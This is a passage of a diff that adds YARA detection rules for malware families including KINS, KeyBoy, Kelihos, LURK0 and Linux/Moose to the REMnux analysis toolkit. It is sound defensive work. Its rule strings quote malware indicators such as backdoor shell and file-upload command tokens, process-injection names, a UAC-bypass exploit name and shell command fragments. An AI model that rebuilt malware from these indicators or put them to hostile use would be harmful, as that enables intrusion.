+        any of them
+}
+
+rule Insta11Strings : Insta11 Family
+{
+    meta:
+        description = "Insta11 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "XTALKER7"
+        $ = "Insta11 Microsoft" wide ascii
+        $ = "wudMessage"
+        $ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1"
+        $ = "B12AE898-D056-4378-A844-6D393FE37956"
+        
+    condition:
+       any of them
+}
+
+rule Insta11 : Family
+{
+    meta:
+        description = "Insta11"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        Insta11Code or Insta11Strings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Intel_Virtualization.yar remnux-rules-0.0.4/yara/malware/Intel_Virtualization.yar
--- remnux-rules-0.0.3/yara/malware/Intel_Virtualization.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Intel_Virtualization.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Intel_Virtualization_Wizard_exe {
+  meta:
+    author = "cabrel@zerklabs.com"
+    description = "Dynamic DLL abuse executable"
+
+    file_1_seen = "2013-05-21"
+    file_1_sha256 = "7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708"
+
+  strings:
+    $a = {4C 6F 61 64 53 54 52 49 4E 47}
+    $b = {49 6E 69 74 69 61 6C 69 7A 65 4B 65 79 48 6F 6F 6B}
+    $c = {46 69 6E 64 52 65 73 6F 75 72 63 65 73}
+    $d = {4C 6F 61 64 53 54 52 49 4E 47 46 72 6F 6D 48 4B 43 55}
+    $e = {68 63 63 75 74 69 6C 73 2E 44 4C 4C}
+  condition:
+    all of them
+}
+
+rule Intel_Virtualization_Wizard_dll {
+  meta:
+    author = "cabrel@zerklabs.com"
+    description = "Dynamic DLL (Malicious)"
+
+    file_1_seen = "2013-05-21"
+    file_1_sha256 = "485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28"
+
+  strings:
+    $a = {48 3A 5C 46 61 73 74 5C 50 6C 75 67 28 68 6B 63 6D 64 29 5C}
+    $b = {64 6C 6C 5C 52 65 6C 65 61 73 65 5C 48 69 6A 61 63 6B 44 6C 6C 2E 70 64 62}
+
+  condition:
+    ($a and $b) and Intel_Virtualization_Wizard_exe
+}
diff -Nru remnux-rules-0.0.3/yara/malware/jRAT.yar remnux-rules-0.0.4/yara/malware/jRAT.yar
--- remnux-rules-0.0.3/yara/malware/jRAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/jRAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule jRAT_conf : rat 
+{
+	meta:
+		description = "jRAT configuration" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-10-11"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py" 
+		ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html" 
+
+	strings:
+		$a = /port=[0-9]{1,5}SPLIT/ 
+
+	condition: 
+		$a
+}
diff -Nru remnux-rules-0.0.3/yara/malware/js_obfuscator.yar remnux-rules-0.0.4/yara/malware/js_obfuscator.yar
--- remnux-rules-0.0.3/yara/malware/js_obfuscator.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/js_obfuscator.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,19 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule jjEncode
+{
+   meta:
+      description = "jjencode detection"
+      ref = "http://blog.xanda.org/2015/06/10/yara-rule-for-jjencode/"
+      author = "adnan.shukor@gmail.com"
+      date = "10-June-2015"
+      version = "1"
+      impact = 3
+      hide = false
+   strings:
+      $jjencode = /(\$|[\S]+)=~\[\]\;(\$|[\S]+)\=\{[\_]{3}\:[\+]{2}(\$|[\S]+)\,[\$]{4}\:\(\!\[\]\+["]{2}\)[\S]+/ fullword 
+   condition:
+      $jjencode
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Kelihos.yar remnux-rules-0.0.4/yara/malware/Kelihos.yar
--- remnux-rules-0.0.3/yara/malware/Kelihos.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Kelihos.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule KelihosHlux
+{
+  meta:
+	author = "@malpush"
+	maltype = "KelihosHlux"
+	description = "http://malwared.ru"
+	date = "22/02/2014"
+  strings:
+    $KelihosHlux_HexString = { 73 20 7D 8B FE 95 E4 12 4F 3F 99 3F 6E C8 28 26 C2 41 D9 8F C1 6A 72 A6 CE 36 0F 73 DD 2A 72 B0 CC D1 07 8B 2B 98 73 0E 7E 8C 07 DC 6C 71 63 F4 23 27 DD 17 56 AE AB 1E 30 52 E7 54 51 F7 20 ED C7 2D 4B 72 E0 77 8E B4 D2 A8 0D 8D 6A 64 F9 B7 7B 08 70 8D EF F3 9A 77 F6 0D 88 3A 8F BB C8 89 F5 F8 39 36 BA 0E CB 38 40 BF 39 73 F4 01 DC C1 17 BF C1 76 F6 84 8F BD 87 76 BC 7F 85 41 81 BD C6 3F BC 39 BD C0 89 47 3E 92 BD 80 60 9D 89 15 6A C6 B9 89 37 C4 FF 00 3D 45 38 09 CD 29 00 90 BB B6 38 FD 28 9C 01 39 0E F9 30 A9 66 6B 19 C9 F8 4C 3E B1 C7 CB 1B C9 3A 87 3E 8E 74 E7 71 D1 }
+   
+  condition:
+    $KelihosHlux_HexString
+}
diff -Nru remnux-rules-0.0.3/yara/malware/KeyBoy.yar remnux-rules-0.0.4/yara/malware/KeyBoy.yar
--- remnux-rules-0.0.3/yara/malware/KeyBoy.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/KeyBoy.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule KeyBoy_Dropper  
+{  
+    meta:
+        Author      = "Rapid7 Labs"
+        Date        = "2013/06/07"
+        Description = "Strings inside"
+        Reference   = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
+
+    strings:
+        $1 = "I am Admin"  
+        $2 = "I am User"  
+        $3 = "Run install success!"  
+        $4 = "Service install success!"  
+        $5 = "Something Error!"  
+        $6 = "Not Configed, Exiting"  
+
+    condition:  
+        all of them  
+}
+
+rule KeyBoy_Backdoor  
+{
+    meta:
+        Author      = "Rapid7 Labs"
+        Date        = "2013/06/07"
+        Description = "Strings inside"
+        Reference   = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
+
+    strings:  
+        $1 = "$login$"  
+        $2 = "$sysinfo$"  
+        $3 = "$shell$"  
+        $4 = "$fileManager$"  
+        $5 = "$fileDownload$"  
+        $6 = "$fileUpload$"  
+
+    condition:  
+        all of them  
+} 
diff -Nru remnux-rules-0.0.3/yara/malware/KINS.yar remnux-rules-0.0.4/yara/malware/KINS.yar
--- remnux-rules-0.0.3/yara/malware/KINS.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/KINS.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule KINS_dropper {
+	meta:
+		author = "AlienVault Labs aortega@alienvault.com"
+		description = "Match protocol, process injects and windows exploit present in KINS dropper"
+		reference = "http://goo.gl/arPhm3"
+	strings:
+		// Network protocol
+		$n1 = "tid=%d&ta=%s-%x" fullword
+		$n2 = "fid=%d" fullword
+		$n3 = "%[^.].%[^(](%[^)])" fullword
+		// Injects
+		$i0 = "%s [%s %d] 77 %s"
+		$i01 = "Global\\%s%x"
+		$i1 = "Inject::InjectProcessByName()"
+		$i2 = "Inject::CopyImageToProcess()"
+		$i3 = "Inject::InjectProcess()"
+		$i4 = "Inject::InjectImageToProcess()"
+		$i5 = "Drop::InjectStartThread()"
+		// UAC bypass
+		$uac1 = "ExploitMS10_092"
+		$uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
+		$uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
+	condition:
+		2 of ($n*) and 2 of ($i*) and 2 of ($uac*)
+}
+
+rule KINS_DLL_zeus {
+	meta:
+		author = "AlienVault Labs aortega@alienvault.com"
+		description = "Match default bot in KINS leaked dropper, Zeus"
+		reference = "http://goo.gl/arPhm3"
+	strings:
+		// Network protocol
+		$n1 = "%BOTID%" fullword
+		$n2 = "%opensocks%" fullword
+		$n3 = "%openvnc%" fullword
+		$n4 = /Global\\(s|v)_ev/ fullword
+		// Crypted strings
+		$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
+		$s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
+		$s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
+		$s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
+		$s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
+	condition:
+		all of ($n*) and 1 of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/kraken_bot1.yar remnux-rules-0.0.4/yara/malware/kraken_bot1.yar
--- remnux-rules-0.0.3/yara/malware/kraken_bot1.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/kraken_bot1.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Kraken_Bot_Sample {
+	meta:
+		description = "Kraken Bot Sample - file inf.bin"
+		author = "Florian Roth"
+		reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"
+		date = "2015-05-07"
+		hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"
+		score = 90
+	strings:
+		$s2 = "%s=?getname" fullword ascii
+		$s4 = "&COMPUTER=^" fullword ascii
+		$s5 = "xJWFwcGRhdGElAA=" fullword ascii /* base64 encoded string '%appdata%' */
+		$s8 = "JVdJTkRJUi" fullword ascii /* base64 encoded string '%WINDIR' */
+		$s20 = "btcplug" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Lenovo_superfish.yar remnux-rules-0.0.4/yara/malware/Lenovo_superfish.yar
--- remnux-rules-0.0.3/yara/malware/Lenovo_superfish.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Lenovo_superfish.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+/* LENOVO Superfish -------------------------------------------------------- */
+
+rule VisualDiscovery_Lonovo_Superfish_SSL_Hijack {
+	meta:
+		description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
+		author = "Florian Roth / improved by kbandla"
+		reference = "https://twitter.com/4nc4p/status/568325493558272000"
+		date = "2015/02/19"
+		hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
+		hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
+		hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
+		hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
+	strings:
+		$mz = { 4d 5a }
+		//$s1 = "VisualDiscovery.exe" fullword wide
+		$s2 = "Invalid key length used to initialize BlowFish." fullword ascii
+		$s3 = "GetPCProxyHandler" fullword ascii
+		$s4 = "StartPCProxy" fullword ascii
+		$s5 = "SetPCProxyHandler" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 2MB and all of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Leverage.yar remnux-rules-0.0.4/yara/malware/Leverage.yar
--- remnux-rules-0.0.3/yara/malware/Leverage.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Leverage.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule leverage_a
+{
+	meta:
+		author = "earada@alienvault.com"
+		version = "1.0"
+		description = "OSX/Leverage.A"
+		date = "2013/09"
+	strings:
+		$a1 = "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F"
+		$a2 = "+:Users:Shared:UserEvent.app:Contents:MacOS:"
+		$a3 = "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'"
+		$script1 = "osascript -e 'tell application \"System Events\" to get the hidden of every login item'"
+		$script2 = "osascript -e 'tell application \"System Events\" to get the name of every login item'"
+		$script3 = "osascript -e 'tell application \"System Events\" to get the path of every login item'"
+		$properties = "serverVisible \x00"
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/LinuxMoose.yar remnux-rules-0.0.4/yara/malware/LinuxMoose.yar
--- remnux-rules-0.0.3/yara/malware/LinuxMoose.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/LinuxMoose.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,82 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+// Linux/Moose yara rules
+// For feedback or questions contact us at: github@eset.com
+// https://github.com/eset/malware-ioc/
+//
+// These yara rules are provided to the community under the two-clause BSD
+// license as follows:
+//
+// Copyright (c) 2015, ESET
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions are met:
+//
+// 1. Redistributions of source code must retain the above copyright notice, this
+// list of conditions and the following disclaimer.
+//
+// 2. Redistributions in binary form must reproduce the above copyright notice,
+// this list of conditions and the following disclaimer in the documentation
+// and/or other materials provided with the distribution.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+//
+
+private rule is_elf
+{
+    strings:
+        $header = { 7F 45 4C 46 }
+
+    condition:
+        $header at 0
+}
+
+rule moose
+{
+    meta:
+        Author      = "Thomas Dupuy"
+        Date        = "2015/04/21"
+        Description = "Linux/Moose malware"
+        Reference   = "http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf"
+        Source = "https://github.com/eset/malware-ioc/"
+        Contact = "github@eset.com"
+        License = "BSD 2-Clause"
+
+    strings:
+        $s0 = "Status: OK"
+        $s1 = "--scrypt"
+        $s2 = "stratum+tcp://"
+        $s3 = "cmd.so"
+        $s4 = "/Challenge"
+        $s7 = "processor"
+        $s9 = "cpu model"
+        $s21 = "password is wrong"
+        $s22 = "password:"
+        $s23 = "uthentication failed"
+        $s24 = "sh"
+        $s25 = "ps"
+        $s26 = "echo -n -e "
+        $s27 = "chmod"
+        $s28 = "elan2"
+        $s29 = "elan3"
+        $s30 = "chmod: not found"
+        $s31 = "cat /proc/cpuinfo"
+        $s32 = "/proc/%s/cmdline"
+        $s33 = "kill %s"
+
+    condition:
+        is_elf and all of them
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/LostDoor.yar remnux-rules-0.0.4/yara/malware/LostDoor.yar
--- remnux-rules-0.0.3/yara/malware/LostDoor.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/LostDoor.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule lost_door : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="23/02/2013"
+		description="Lost Door"
+	
+	strings:
+		$signature1={45 44 49 54 5F 53 45 52 56 45 52} /*EDIT_SERVER*/
+		
+	condition:
+		$signature1
+}
diff -Nru remnux-rules-0.0.3/yara/malware/LuckyCat.yar remnux-rules-0.0.4/yara/malware/LuckyCat.yar
--- remnux-rules-0.0.3/yara/malware/LuckyCat.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/LuckyCat.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LuckyCatCode : LuckyCat Family 
+{
+    meta:
+        description = "LuckyCat code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $xordecrypt = { BF 0F 00 00 00 F7 F7 ?? ?? ?? ?? 32 14 39 80 F2 7B }
+        $dll = { C6 ?? ?? ?? 64 C6 ?? ?? ?? 6C C6 ?? ?? ?? 6C }
+        $commonletters = { B? 63 B? 61 B? 73 B? 65 }
+        
+    condition:
+        $xordecrypt or ($dll and $commonletters)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/LURK0_CCTV0.yar remnux-rules-0.0.4/yara/malware/LURK0_CCTV0.yar
--- remnux-rules-0.0.3/yara/malware/LURK0_CCTV0.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/LURK0_CCTV0.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,88 @@
+rule LURK0Header : Family LURK0 {
+meta:
+description = "5 char code for LURK0"
+author = "Katie Kleemola"
+last_updated = "07-21-2014"
+
+strings:
+$ = { C6 [5] 4C C6 [5] 55 C6 [5] 52 C6 [5] 4B C6 [5] 30 }
+
+condition:
+any of them
+}
+
+rule CCTV0Header : Family CCTV0 {
+meta:
+description = "5 char code for LURK0"
+author = "Katie Kleemola"
+last_updated = "07-21-2014"
+
+strings:
+//if its just one char a time
+$ = { C6 [5] 43 C6 [5] 43 C6 [5] 54 C6 [5] 56 C6 [5] 30 }
+// bit hacky but for when samples dont just simply mov 1 char at a time
+$ = { B0 43 88 [3] 88 [3] C6 [3] 54 C6 [3] 56 [0-12] (B0 30 | C6 [3] 30) }
+
+condition:
+any of them
+}
+
+rule SharedStrings : Family {
+meta:
+description = "Internal names found in LURK0/CCTV0 samples"
+author = "Katie Kleemola"
+last_updated = "07-22-2014"
+
+strings:
+// internal names
+$i1 = "Butterfly.dll"
+$i2 = /\\BT[0-9.]+\\ButterFlyDLL\\/
+$i3 = "ETClientDLL"
+
+// dbx
+$d1 = "\\DbxUpdateET\\" wide
+$d2 = "\\DbxUpdateBT\\" wide
+$d3 = "\\DbxUpdate\\" wide
+
+// other folders
+$mc1 = "\\Micet\\"
+
+// embedded file names
+$n1 = "IconCacheEt.dat" wide
+$n2 = "IconConfigEt.dat" wide
+
+
+ 
+$m1 = "\x00\x00ERXXXXXXX\x00\x00" wide
+$m2 = "\x00\x00111\x00\x00" wide
+$m3 = "\x00\x00ETUN\x00\x00" wide
+$m4 = "\x00\x00ER\x00\x00" wide
+
+condition:
+any of them //todo: finetune this
+
+}
+
+rule LURK0 : Family LURK0 {
+
+meta:
+description = "rule for lurk0"
+author = "Katie Kleemola"
+last_updated = "07-22-2014"
+
+condition:
+LURK0Header and SharedStrings
+
+}
+
+rule CCTV0 : Family CCTV0 {
+
+meta:
+description = "rule for cctv0"
+author = "Katie Kleemola"
+last_updated = "07-22-2014"
+
+condition:
+CCTV0Header and SharedStrings
+
+}
diff -Nru remnux-rules-0.0.3/yara/malware/LURK0.yar remnux-rules-0.0.4/yara/malware/LURK0.yar
--- remnux-rules-0.0.3/yara/malware/LURK0.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/LURK0.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,96 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LURK0Header : Family LURK0 {
+	meta:
+		description = "5 char code for LURK0"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = { C6 [5] 4C C6 [5] 55 C6 [5] 52 C6 [5] 4B C6 [5] 30 }
+
+	condition:
+		any of them
+}
+
+rule CCTV0Header : Family CCTV0 {
+        meta:  
+		description = "5 char code for LURK0"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+
+	strings:
+		//if its just one char a time
+		$ = { C6 [5] 43 C6 [5] 43 C6 [5] 54 C6 [5] 56 C6 [5] 30 }
+		// bit hacky but for when samples dont just simply mov 1 char at a time
+		$ = { B0 43 88 [3] 88 [3] C6 [3] 54 C6 [3] 56 [0-12] (B0 30 | C6 [3] 30) }
+
+	condition:
+		any of them
+}
+
+rule SharedStrings : Family {
+	meta:
+		description = "Internal names found in LURK0/CCTV0 samples"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+	
+	strings:
+		// internal names
+		$i1 = "Butterfly.dll"
+		$i2 = /\\BT[0-9.]+\\ButterFlyDLL\\/
+		$i3 = "ETClientDLL"
+
+		// dbx
+		$d1 = "\\DbxUpdateET\\" wide
+		$d2 = "\\DbxUpdateBT\\" wide
+		$d3 = "\\DbxUpdate\\" wide
+		
+		// other folders
+		$mc1 = "\\Micet\\"
+
+		// embedded file names
+		$n1 = "IconCacheEt.dat" wide
+		$n2 = "IconConfigEt.dat" wide
+
+		$m1 = "\x00\x00ERXXXXXXX\x00\x00" wide
+		$m2 = "\x00\x00111\x00\x00" wide
+		$m3 = "\x00\x00ETUN\x00\x00" wide
+		$m4 = "\x00\x00ER\x00\x00" wide
+
+	condition:
+		any of them //todo: finetune this
+
+}
+
+rule LURK0 : Family LURK0 {
+	
+	meta:
+		description = "rule for lurk0"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+
+	condition:
+		LURK0Header and SharedStrings
+
+}
+
+
+rule CCTV0 : Family CCTV0 {
+
+	meta:
+		description = "rule for cctv0"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+
+	condition:
+		CCTV0Header and SharedStrings
+
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/MacControl.yar remnux-rules-0.0.4/yara/malware/MacControl.yar
--- remnux-rules-0.0.3/yara/malware/MacControl.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/MacControl.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,56 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule MacControlCode : MacControl Family 
+{
+    meta:
+        description = "MacControl code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-17"
+        
+    strings:
+        // Load these function strings 4 characters at a time. These check the first two blocks:
+        $L4_Accept = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 3A 20 }
+        $L4_AcceptLang = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 2D 4C }
+        $L4_Pragma = { C7 ?? 50 72 61 67 C7 ?? 04 6D 61 3A 20 }
+        $L4_Connection = { C7 ?? 43 6F 6E 6E C7 ?? 04 65 63 74 69 }
+        $GEThgif = { C7 ?? 47 45 54 20 C7 ?? 04 2F 68 2E 67 }
+        
+    condition:
+        all of ($L4*) or $GEThgif
+}
+
+rule MacControlStrings : MacControl Family
+{
+    meta:
+        description = "MacControl Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-17"
+        
+    strings:
+        $ = "HTTPHeadGet"
+        $ = "/Library/launched"
+        $ = "My connect error with no ip!"
+        $ = "Send File is Failed"
+        $ = "****************************You Have got it!****************************"
+        
+    condition:
+        any of them
+}
+
+rule MacControl : Family
+{
+    meta:
+        description = "MacControl"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    condition:
+        MacControlCode or MacControlStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Madness.yar remnux-rules-0.0.4/yara/malware/Madness.yar
--- remnux-rules-0.0.3/yara/malware/Madness.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Madness.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+
+rule Madness {
+    meta:
+        author = "Jason Jones <jasonjones@arbor.net>"
+        date = "2014-01-15"
+        description = "Identify Madness Pro DDoS Malware"
+        source = "https://github.com/arbor/yara/blob/master/madness.yara"
+    strings:
+        $ua1 = "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE"
+        $ua2 = "TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ=="
+        $str1= "document.cookie=" fullword
+        $str2 = "[\"cookie\",\"" fullword
+        $str3 = "\"realauth=" fullword
+        $str4 = "\"location\"];" fullword
+        $str5 = "d3Rm" fullword
+        $str6 = "ZXhl" fullword
+    condition:
+        all of them
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/Mailers.yar remnux-rules-0.0.4/yara/malware/Mailers.yar
--- remnux-rules-0.0.3/yara/malware/Mailers.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Mailers.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,43 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+  Description: This rule keys on email headers that may have been sent from a malicious PHP script on a compromised webserver.
+  Priority: 4
+  Scope: Against Email
+  Tags: None
+  Author: P.Burbage
+  Created in PhishMe's Triage on September 1, 2015 1:43 PM
+*/
+
+rule PM_Email_Sent_By_PHP_Script
+{
+  strings:
+    $php1="X-PHP-Script" fullword
+    $php2="X-PHP-Originating-Script" fullword
+    $php3="/usr/bin/php" fullword
+
+  condition:
+    any of them
+}
+
+/*
+  Description: Hits on ZIP attachments that contain *.js or *.jse - usually JS Dropper malware that has downloaded Kovter & Boaxee in the past.
+  Priority: 5
+  Scope: Against Attachment
+  Tags: FileID
+  Author: P.Burbage
+  Created in PhishMe's Triage on September 1, 2015 1:43 PM
+*/
+
+rule PM_Zip_with_js
+{
+  strings:
+    $hdr="PK" 
+    $e1=".js" nocase
+    $e2=".jse" nocase
+
+  condition:
+    $hdr at 0 and (($e1 in (filesize-100..filesize)) or ($e2 in (filesize-100..filesize)))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Meterpreter_Reverse_Tcp.yar remnux-rules-0.0.4/yara/malware/Meterpreter_Reverse_Tcp.yar
